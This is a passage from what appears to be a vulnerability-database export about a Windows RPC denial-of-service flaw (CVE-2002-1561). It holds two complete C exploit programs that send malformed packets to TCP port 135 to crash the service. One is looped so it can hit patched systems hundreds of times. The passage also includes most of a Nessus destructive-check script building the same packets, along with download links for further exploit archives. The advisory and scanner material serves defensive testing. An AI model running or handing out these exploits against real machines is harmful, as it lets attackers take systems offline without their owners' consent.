of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n\r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n\r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n\r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. \r\n\r\n/*\r\n************************************************************************\r\n* MS WIN RPC DoS CODE FROM SPIKE v2.7\r\n* \r\n* Compile it use:\r\n* cl winnuke.c\r\n*\r\n* Usage:\r\n* winnuke targetip \r\n*\r\n* Code by lion, Welcomde to HUC Website Http://www.cnhonker.com\r\n* 2002/10/22\r\n************************************************************************\r\n*/\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nchar sendcode1[] = \r\n\t\"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\r\n\t\"\\xd0\\x16\\xd0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n\t\"\\x60\\x9e\\xe7\\xb9\\x52\\x3d\\xce\\x11\\xaa\\xa1\\x00\\x00\\x69\\x01\\x29\\x3f\"\r\n\t\"\\x02\\x00\\x02\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\r\n\t\"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x01\\x10\\x00\\x00\\x00\"\r\n\t\"\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\\x20\\x27\\x01\\x00\\x00\\x00\\x02\\x00\"\r\n\t\"\\xf0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x00\\x00\\x00\";\r\n\r\nchar sendcode2[] = \r\n\t\"\\x88\\x13\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x13\\x00\\x00\";\r\n\r\nchar sendcode3[] = \r\n\t\"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\";\r\n\r\nchar sendcode4[] = \r\n\t\"\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\xff\\x00\\x00\\x3d\\x3d\\x3d\\x3d\" \r\n\t\"\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\"\r\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\x50\\x10\\x01\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode5[] = \r\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\x80\\xf9\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode6[] = \r\n\t\"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\xb0\\xe2\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode7[] = \r\n\t\"\\x05\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x60\\x15\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n\t\"\\x60\\x15\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode8[] = \r\n\t\"\\x00\\x00\\x01\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tWSADATA wsaData;\r\n\tWORD wVersionRequested;\r\n\tstruct hostent \t\t*pTarget;\r\n\tstruct sockaddr_in \tsock;\r\n\tchar *targetip;\r\n\tint port,bufsize;\r\n\tSOCKET s;\r\n\tchar buffer[20480];\r\n\r\n\tprintf(\"========================= HUC Win2000/XP RPC Nuke V0.10 =======================\\r\\n\");\r\n\tprintf(\"================= By Lion, Welcome to http://www.cnhonker.com =================\\r\\n\\n\");\r\n\r\n\tif (argc < 2)\r\n\t{\r\n\t\tprintf(\"Usage:\\r\\n\");\r\n\t\tprintf(\" %s <TargetIP> [TargetPort]\\r\\n\", argv[0]);\r\n\t\tprintf(\"Example:\\r\\n\");\r\n\t\tprintf(\" %s 192.168.0.1\\r\\n\", argv[0]);\r\n\t\tprintf(\" %s 192.168.0.1 135\\r\\n\", argv[0]);\r\n\t\tprintf(\"PS:\\r\\n\");\r\n\t\tprintf(\" If target is XP, try 2 times.\\r\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\twVersionRequested = MAKEWORD(1, 1);\r\n\tif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n\ttargetip = argv[1];\r\n\tport = 135;\r\n\tif (argc >= 3) port = atoi(argv[2]);\r\n\tbufsize = 512;\r\n\tif (argc >= 4) bufsize = atoi(argv[3]);\r\n\r\n\ts = socket(AF_INET, SOCK_STREAM, 0);\r\n\tif(s==INVALID_SOCKET)\r\n\t{\t\r\n\t\tprintf(\"Socket error!\\r\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"Resolving Hostnames...\\n\");\r\n\tif ((pTarget = gethostbyname(targetip)) == NULL)\r\n\t{\r\n\t\tprintf(\"Resolve of %s failed, please try again.\\n\", argv[1]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n\tsock.sin_family = AF_INET;\r\n\tsock.sin_port = htons((USHORT)port);\r\n\r\n\tprintf(\"Connecting...\\n\");\r\n\tif ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))\r\n\t{\r\n\t\tprintf(\"Couldn't connect to host.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"Connected!...\\n\");\r\n\tprintf(\"Sending Packets...\\n\");\r\n\tif (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)\r\n\t{\r\n\t\tprintf(\"Error sending nuke Packets\\r\\n\");\r\n\t\tclosesocket(s);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemset(&buffer, '\\x41', 240);\r\n\tsend(s, buffer, 240, 0);\r\n\r\n\tsend(s, sendcode2, sizeof(sendcode2)-1, 0);\r\n\tmemset(&buffer, '\\x42', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode3, sizeof(sendcode3)-1, 0);\r\n\tmemset(&buffer, '\\x43', 512);\r\n\tsend(s, buffer, 512, 0);\r\n\t\r\n\tsend(s, sendcode4, sizeof(sendcode4)-1, 0);\r\n//\tmemset(&buffer, '\\x44', 20480);\r\n//\tsend(s, buffer, 20480, 0);\r\n\r\n//\t/*\r\n\tmemset(&buffer, '\\x44', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode5, sizeof(sendcode5)-1, 0);\r\n\tmemset(&buffer, '\\x45', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode6, sizeof(sendcode6)-1, 0);\r\n\tmemset(&buffer, '\\x46', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode7, sizeof(sendcode7)-1, 0);\r\n\tmemset(&buffer, '\\x47', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\r\n\tsend(s, sendcode8, sizeof(sendcode8)-1, 0);\r\n\tmemset(&buffer, '\\x48', 5000);\r\n\tsend(s, buffer, 5000, 0);\r\n\t\r\n//\t*/ \r\n\tprintf(\"Nuked! \\r\\nIf target is XP, try a again! :)\\r\\n\");\r\n\tclosesocket(s);\r\n\tWSACleanup();\r\n\treturn 0;\r\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21951/"}, {"lastseen": "2016-02-02T17:38:20", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2). CVE-2002-1561. Dos exploit for windows platform", "published": "2002-10-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-22T00:00:00", "id": "EDB-ID:21952", "href": "https://www.exploit-db.com/exploits/21952/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n \r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n \r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n \r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n \r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. \r\n\r\n/*\r\n* Microsoft Windows NT RPC Service Denial of Service Vulnerability\r\n*\r\n* Orginal Code By Lion @ http://www.cnhonker.com\r\n* Upgraded By Trancer @ http://BinaryVision.tech.nu\r\n*\r\n* I have notice that even after a Windows NT system is patched aginst this\r\nvulnerability with an offical M$ update,\r\n* an attacker can still DoS that system if he activate this exploit a lot\r\nof times, fast.\r\n* So I've upgraded the exploit by looping it and letting you control the\r\ntimes you want to nuke a system\r\n* (with a patched 2000\\XP 250-400 times is recommended).\r\n*\r\n* That's it. enjoy :-)\r\n\\*\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nchar sendcode1[] =\r\n \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x02\\x00\\x00\\x00\"\r\n \"\\xd0\\x16\\xd0\\x16\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\r\n \"\\x60\\x9e\\xe7\\xb9\\x52\\x3d\\xce\\x11\\xaa\\xa1\\x00\\x00\\x69\\x01\\x29\\x3f\"\r\n \"\\x02\\x00\\x02\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\r\n \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x01\\x10\\x00\\x00\\x00\"\r\n \"\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\\x20\\x27\\x01\\x00\\x00\\x00\\x02\\x00\"\r\n \"\\xf0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x00\\x00\\x00\";\r\n\r\nchar sendcode2[] =\r\n \"\\x88\\x13\\x00\\x00\\x00\\x00\\x00\\x00\\x88\\x13\\x00\\x00\";\r\n\r\nchar sendcode3[] =\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n \"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\";\r\n\r\nchar sendcode4[] =\r\n \"\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\xff\\x00\\x00\\x3d\\x3d\\x3d\\x3d\"\r\n \"\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\\x3d\"\r\n \"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\x50\\x10\\x01\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode5[] =\r\n \"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\x80\\xf9\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode6[] =\r\n \"\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\x16\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\xb0\\xe2\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode7[] =\r\n \"\\x05\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x60\\x15\\x00\\x00\\x8f\\x00\\x00\\x00\"\r\n \"\\x60\\x15\\x00\\x00\\x00\\x00\\x02\\x00\";\r\n\r\nchar sendcode8[] =\r\n \"\\x00\\x00\\x01\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData;\r\n WORD wVersionRequested;\r\n struct hostent *pTarget;\r\n struct sockaddr_in sock;\r\n char *targetip;\r\n int port,bufsize,times,i;\r\n SOCKET s;\r\n char buffer[20480];\r\n\r\n printf(\"======================= Windows NT Multi RPC Nuke V0.12\r\n======================\\r\\n\");\r\n printf(\"=============== Orginal Code By Lion @ http://www.cnhonker.com\r\n===============\\r\\n\");\r\n printf(\"============= Upgraded By Trancer @ http://BinaryVision.tech.nu\r\n==============\\r\\n\\n\");\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"Usage:\\r\\n\");\r\n printf(\" %s <TargetIP> <TargetPort> <BufferSize> <Times>\\r\\n\", argv[0]);\r\n printf(\"Exaple: %s 198.167.0.1 135 512 250\\r\\n\", argv[0]);\r\n printf(\"PS:\\r\\n\");\r\n printf(\" If target is XP, try 2 times.\\r\\n\");\r\n exit(1);\r\n }\r\n\r\n wVersionRequested = MAKEWORD(1, 1);\r\n if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n targetip = argv[1];\r\n port = 135;\r\n if (argc >= 3) port = atoi(argv[2]);\r\n bufsize = 512;\r\n if (argc >= 4) bufsize = atoi(argv[3]);\r\n times = 1;\r\n if (argc >= 5) times = atoi(argv[4]);\r\n\r\n for (i = 0; i < times; i = i + 1)\r\n {\r\n\r\n s = socket(AF_INET, SOCK_STREAM, 0);\r\n if(s==INVALID_SOCKET)\r\n {\r\n printf(\"Socket error!\\r\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Resolving Hostnames...\\n\");\r\n if ((pTarget = gethostbyname(targetip)) == NULL)\r\n {\r\n printf(\"Resolve of %s failed, please try again.\\n\", argv[1]);\r\n exit(1);\r\n }\r\n\r\n memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n sock.sin_family = AF_INET;\r\n sock.sin_port = htons((USHORT)port);\r\n\r\n printf(\"Connecting...\\n\");\r\n if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))\r\n {\r\n printf(\"Couldn't connect to host.\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Connected!...\\n\");\r\n printf(\"Sending Packets...\\n\");\r\n if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)\r\n {\r\n printf(\"Error sending nuke Packets\\r\\n\");\r\n closesocket(s);\r\n exit(1);\r\n }\r\n\r\n memset(&buffer, '\\x41', 240);\r\n send(s, buffer, 240, 0);\r\n\r\n send(s, sendcode2, sizeof(sendcode2)-1, 0);\r\n memset(&buffer, '\\x42', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode3, sizeof(sendcode3)-1, 0);\r\n memset(&buffer, '\\x43', 512);\r\n send(s, buffer, 512, 0);\r\n\r\n send(s, sendcode4, sizeof(sendcode4)-1, 0);\r\n memset(&buffer, '\\x44', 20480);\r\n send(s, buffer, 20480, 0);\r\n\r\n memset(&buffer, '\\x44', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode5, sizeof(sendcode5)-1, 0);\r\n memset(&buffer, '\\x45', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode6, sizeof(sendcode6)-1, 0);\r\n memset(&buffer, '\\x46', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode7, sizeof(sendcode7)-1, 0);\r\n memset(&buffer, '\\x47', 5000);\r\n send(s, buffer, 5000, 0);\r\n\r\n send(s, sendcode8, sizeof(sendcode8)-1, 0);\r\n memset(&buffer, '\\x48', 5000);\r\n send(s, buffer, 5000, 0);\r\n i = i + 1;\r\n }\r\n\r\n if (times < 2)\r\n {\r\n printf(\"Nuked! If target is XP, try a again! :)\\r\\n\");\r\n }\r\n else\r\n {\r\n printf(\"%s was nuked %s times\\r\\n\", argv[1], argv[4]);\r\n }\r\n\r\n closesocket(s);\r\n WSACleanup();\r\n return 0;\r\n}\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21952/"}, {"lastseen": "2016-02-02T17:38:28", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3). CVE-2002-1561. Dos exploit for windows platform", "published": "2002-10-18T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-18T00:00:00", "id": "EDB-ID:21953", "href": "https://www.exploit-db.com/exploits/21953/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n \r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n \r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n \r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n \r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21953.tar.gz", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21953/"}, {"lastseen": "2016-02-02T17:38:36", "description": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4). CVE-2002-1561. Dos exploit for windows platform", "published": "2002-10-18T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability 4", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1561"], "modified": "2002-10-18T00:00:00", "id": "EDB-ID:21954", "href": "https://www.exploit-db.com/exploits/21954/", "sourceData": "source: http://www.securityfocus.com/bid/6005/info\r\n \r\nThe Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.\r\n \r\nThis vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.\r\n \r\nIt has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.\r\n \r\nA variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21954.rar", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21954/"}], "nessus": [{"lastseen": "2021-01-01T03:53:42", "description": "MS Windows RPC service (RPCSS) crashes trying to dereference a NULL\npointer when it receives a certain malformed request. All MS RPC-based\nservices (i.e. a large part of MS Windows 2000+) running on the target\nmachine are rendered inoperable.", "edition": 26, "published": "2002-11-21T00:00:00", "title": "MS03-010: Microsoft Windows RPC Endpoint Manager Malformed Packet DoS (331953) (intrusive check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1561"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "MSRPC-SPIKE27.NASL", "href": "https://www.tenable.com/plugins/nessus/11159", "sourceData": "#\n# Test \"Spike 2.7\" MS RPC Services NULL pointer reference DoS\n#\n# Copyright (c) 2002 Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n# Permission to copy, modify, and redistribute this script under\n# the terms of the GNU General Public License is hereby granted.\n#\n# This script is based on an exploit published on BugTraq:\n# Code by lion, Welcomde to HUC Website Http://www.cnhonker.com\n# 2002/10/22\n#\n\n# Changes by Tenable:\n# - Revised plugin title, added 'see also' (6/24/09)\n# - Changed family (6/25/09)\n# - Revised plugin title, changed family again (10/23/09)\n# - Add MSKB script_xref (8/29/17)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11159);\n script_version(\"1.30\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2002-1561\");\n script_bugtraq_id(6005);\n script_xref(name:\"MSFT\", value:\"MS03-010\");\n script_xref(name:\"MSKB\", value:\"331953\");\n\n script_name(english:\"MS03-010: Microsoft Windows RPC Endpoint Manager Malformed Packet DoS (331953) (intrusive check)\");\n script_summary(english:\"Attempts to crash MS RPC service the Spike 2.7-way\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"MS Windows RPC service (RPCSS) crashes trying to dereference a NULL\npointer when it receives a certain malformed request. All MS RPC-based\nservices (i.e. a large part of MS Windows 2000+) running on the target\nmachine are rendered inoperable.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-010\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the patch referenced in the Microsoft bulletin.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/11/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Pavel Kankovsky\");\n script_family(english:\"Windows\");\n\n script_dependencie(\"find_service1.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(135);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n#\n# Prepare DCE BIND request\n#\n\nfunction dce_bind()\n{\n local_var req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers;\n\n # Service UUID:\n # B9E79E60-3D52-11CE-AAA1-00006901293F\n # (this is one of the services bound to port 135)\n sv_uuid = raw_string(\n 0x60, 0x9E, 0xE7, 0xB9, 0x52, 0x3D, 0xCE, 0x11,\n 0xAA, 0xA1, 0x00, 0x00, 0x69, 0x01, 0x29, 0x3F);\n # The version is incorrect \"for extra fun\" (should be 0.2)\n sv_vers = raw_string(0x02, 0x00, 0x02, 0x00);\n\n # Transfer syntar UUID:\n # 8A885D04-1CEB-11C9-9FE8-08002B104860\n ts_uuid = raw_string(\n 0x04, 0x5D, 0x88, 0x8A, 0xEB, 0x1C, 0xC9, 0x11,\n 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);\n ts_vers = raw_string(0x02, 0x00, 0x00, 0x00);\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x0b, 0x03, # BINDPACKET, flags (1st+last frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0x48, 0x00, # fragment length (72)\n 0x00, 0x00, # auth length\n 0x02, 0x00, 0x00, 0x00, # call id\n 0xd0, 0x16, 0xd0, 0x16, # max xmit frag, max recv frag\n 0x00, 0x00, 0x00, 0x00, # assoc group\n 0x01, # num ctx items\n 0x00, 0x00, 0x00, # (padding)\n 0x00, 0x00, # p_cont_id\n 0x01, # n_transfer_syn\n 0x00); # (padding)\n\n return (string(\n req_hdr, sv_uuid, sv_vers, ts_uuid, ts_vers));\n}\n\n#\n# Prepare evil DCE request I\n#\n\nfunction attack_dce_req_1()\n{\n local_var req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6, req_hdr;\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x01, # REQUESTPACKET, flags (1st frag)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n 0x20, 0x27, 0x01, 0x00, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00, # opnum: 0\n 0xf0, 0x00, 0x00, 0x00, # ?\n 0x00, 0x00, 0x00, 0x00, # ?\n 0x0f, 0x00, 0x00, 0x00); # ?\n\n req_dt1 = crap(data:raw_string(0x41), length:240);\n\n req_dt2 = raw_string(\n 0x88, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x88, 0x13, 0x00, 0x00);\n\n req_dt3 = crap(data:raw_string(0x42), length:5000);\n\n req_dt4 = raw_string(\n 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00);\n\n req_dt5 = crap(data:raw_string(0x43), length:512);\n\n req_dt6 = raw_string(\n 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0xfe, 0xff, 0x00, 0x00, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d,\n 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d);\n\n return (string(\n req_hdr, req_dt1, req_dt2, req_dt3, req_dt4, req_dt5, req_dt6));\n}\n\n#\n# Prepare evil DCE request II\n# the size does not match fragment length?!\n#\n\nfunction attack_dce_req_2(ah, stuff)\n{\n local_var ah0, ah1, ah2, ah3, req_dt1, req_hdr;\n\n # grrr...nasl barfs on (ah/xx) & 0xff\n ah0 = ah & 0xff;\n ah1 = ah / 256; ah1 = ah1 & 0xff;\n ah2 = ah / 65536; ah2 = ah2 & 0xff;\n ah3 = ah / 16777216; ah3 = ah3 & 0xff;\n\n # Request header\n req_hdr = raw_string(\n 0x05, 0x00, # version, minor version\n 0x00, 0x00, # REQUESTPACKET, flags (none)\n 0x10, 0x00, 0x00, 0x00, # data representation (LE, ASCII, IEEE fp)\n 0xd0, 0x16, # fragment length (5840...hmmm)\n 0x00, 0x00, # auth length\n 0x8f, 0x00, 0x00, 0x00, # call id\n ah0, ah1, ah2, ah3, # alloc hint\n 0x00, 0x00, # context id\n 0x02, 0x00); # opnum: ?\n\n req_dt1 = crap(data:raw_string(stuff), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n#\n# Prepare evil DCE request III\n# this makes absolutely no sense, hmm...\n# the attack appears to work without it...\n#\n\nfunction attack_dce_req_3()\n{\n local_var req_dt1, req_hdr;\n\n # Request header? eh...sort of\n req_hdr = raw_string(\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x01, 0x10, 0x00, 0x00);\n\n req_dt1 = crap(data:raw_string(0x48), length:5000);\n\n return (string(req_hdr, req_dt1));\n}\n\n#\n# Carry out the attack.\n#\n\nfunction attack(port)\n{\n local_var\ti, r, soc;\n # connect\n soc = NULL;\n for (i = 0; i < 3 && ! soc; i ++)\n {\n sleep(i);\n soc = open_sock_tcp(port);\n }\n if (!soc) return (1);\n\n # send bind request and check whether we got some reply\n # this is used as a liveness test\n send(socket:soc, data:dce_bind());\n r = recv(socket:soc, length:16);\n if (strlen(r) < 16) return (1);\n\n # send the evil packets\n send(socket:soc, data:attack_dce_req_1());\n send(socket:soc, data:attack_dce_req_2(ah:0x011050, stuff:0x44));\n send(socket:soc, data:attack_dce_req_2(ah:0xf980, stuff:0x45));\n send(socket:soc, data:attack_dce_req_2(ah:0xe2b0, stuff:0x46));\n send(socket:soc, data:attack_dce_req_2(ah:0x1560, stuff:0x47));\n send(socket:soc, data:attack_dce_req_3());\n\n # see you!\n 